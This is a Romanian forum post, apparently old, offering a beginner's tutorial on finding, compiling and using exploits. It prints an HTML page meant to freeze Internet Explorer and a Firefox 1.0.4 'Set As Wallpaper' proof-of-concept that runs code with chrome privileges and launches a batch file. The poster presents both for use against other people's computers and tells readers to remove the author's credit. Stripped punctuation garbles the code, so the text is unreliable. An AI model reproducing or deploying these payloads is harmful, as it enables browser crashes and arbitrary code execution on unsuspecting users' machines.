DIGITAL FREESAT FORUM
Here you find everything about the satellites for satellite receivers software, keys, movies, music ..... many other
|
Lista Forumurilor Pe Tematici
|
DIGITAL FREESAT FORUM | Inregistrare | Login
POZE DIGITAL FREESAT FORUM
Nu sunteti logat.
|
Nou pe simpatie:
roxigirl85
 | Femeie
25 ani
Bucuresti
cauta Barbat
30 - 46 ani |
|
|
desxy
Membru nou
Inregistrat: acum 16 ani
Postari: 15
|
|
Gauri de Securitate
-part 1-
EXPLOITS
Exploits sunt script-uri create de hackeri pt a avea acces la Servere deamond,linux...
Am creat acest tutorial deoarce nu multi stiu ce este un exploit si poate majoritatea nici
nu au auzit.Va voi arata in continuare pasii pt acesare un shell(script kiddley).
La un exploit se gaseste doar codul sursa.El se compileaza folosind un Compilator adecvat pt
acel cod sursa.Puteti face rost de un exploit de pe ,
httpwww.securityfocus.com pt inceput compilatil
httpdownload.kappa.roaction__categoryid__46.De obicei exploits sunt pt Linux dar daca aveti
alt sistem de operare nu va faceti griji puteti sa il rulati direct din Command-Promt sau Shell
mai sunt si alte exploit care nu trebuiesc compilate cum ar fi scripturile in php si js acestea
se introduc in sursa Pagini.
Cum adunam date despre server(HTTP sau PC..)pai daca este un sever HTTP cautam un scaner pt
cgi-bin care ne arata versiunea servarului si Bug-urile nepatch-uite din server si ne ajuta la
injection ... cateva pagini folosite de admini pt loagare.Daca este un computer noramal
vom folosi un Who IS sau un scaner de porturi professional(trebuie sa ne de mai multe indici)
Recomand GFI sau SuperScan.Odata ce am aflta ce sistem are si celelalte informati cautam un
exploit pe adresele mentionate mai sus.Aveti grija incercati sa modificati databese daca vedeti
ca da eroare cand incercati sa o compilati ar trebui modificata ,dar mai intai trebuie sa va
asigurati ca codul nu contine INFORMATI sau CREDITS.Cele mai multe au erori din cauza linilor
puse de eroare diferitelor Pagin,programe,etc.
Mozilla Firefox=1.0.4 Set As Wallpaper
Va voi prezenta un exploit care mi-a placut foarte mult.El exploateaza un bug in Mozilla asfel
un java-script aflat in spatele comenzilor de Wallpaper
div style=positionrelative; width300px; height250px;
img src=javascript
asfel pacalind Browserul.Un trick care mie mi-a placut foarte mult din IE(all version) era
blocare PC si resetare acesta procedura era posibila deoarce IE nu avea o optiune anume pt poze
asa ce o afisa pe toata.Codul sursa trebuie copiat intr-o pagina HTML.el trebui introdus in
BODY.
!DOCTYPE html PUBLIC -W3CDTD XHTML 1.0 StrictEN
httpwww.w3.orgTRxhtml1DTDxhtml1-strict.dtd
html
head
title(title
meta name=keywords content=microsoft,windows,img,bug,html
head
body
p
img src=pic.png width=9999999 height=9999999 alt=puh
If you are using Microsoft Windows and are able to read this, feel lucky!br
A tip Quit your web browser immediately and pray that your unsaved documents get saved!br
iframe src=httpwww.idg.seArticlePages20050609200506090951 28_MD20050609095128_MD.dbp.asp width=1024 height=768 br
p
body
html
sa revenim la Mozilla.Atentie codul sursa trebuie inserat si el tot intr-o pagina html il puteti
folosi si pe primul si pe al doilea ca sa va asigurati ca nu ati muncit degeaba in
momentul acela se reseteaza pc-ul cuiva(in caz ca fol IE)In caz ca fol alt browser inafara de
cele mentionate mai sus Toate celelate sunt copy dupa IE inafara de Opera care il recomand sa il
folositi cu toti pt ca nu am gasit nici un bug deocamdata.
eliminati Creditul.
Exploit by Michael Krax
!DOCTYPE HTML PUBLIC -W3CDTD HTML 4.01 TransitionalEN
html
head
titleFirewalling - Proof-of-Concepttitle
script
function stopload() {
in some cases the javascript url never stops to load
therefore we force a stop after the real image got loaded
window.setTimeout(window.stop(),1000);
}
script
head
body
div style=font-familyVerdana;font-size11px;
div style=font-familyVerdana;font-size15px;font-weightbold;
Firewalling - Proof-of-Conceptdiv
div style=width600px
The Set As Wallpaper dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
brbr
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
brbr
Right click on the image and choose Set As Wallpaper. The demo requests
UniversalXPConnect rights, creates cbooom.bat and launches the batch file
that shows a directoy listing in a dos box (Windows only).
brbr
div style=positionrelative; width300px; height250px;
img src=javascript-----------------------------eval('if(document.location.href.
substr(0,6)=='chrome'){netscape.security.Privile geManager.enablePrivilege('
UniversalXPConnect');file=Components.classes['@mozilla.orgfilelocal;1'].
createInstance(Components.interfaces.nsILocalFile) ;file.initWithPath('c
booom.bat');file.createUnique(Components.interfac es.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes['@mozilla.orgnetworkfile-output-stream;
1'].createInstance(Components.interfaces.nsIFileOutpu tStream);outputStream.init
(file,0x040x080x20,420,0);output='@ECHO OFFnBEGINnCLSnDIRnPAUSE
nEND';outputStream.write(output,output.length) ;outputStream.close();file.launch
();}else{void(0)}') width=300 height=250 alt= border=0 style=position
absolute; left0px; top0px; z-index2; -moz-opacity0;
img src=httpwww.site.comimageslogo.png width=300 height=250 alt= border=0 style=position
absolute; left0px; top0px; z-index1; onload=stopload()
div
div
body
html
|
|
| pus acum 16 ani |
|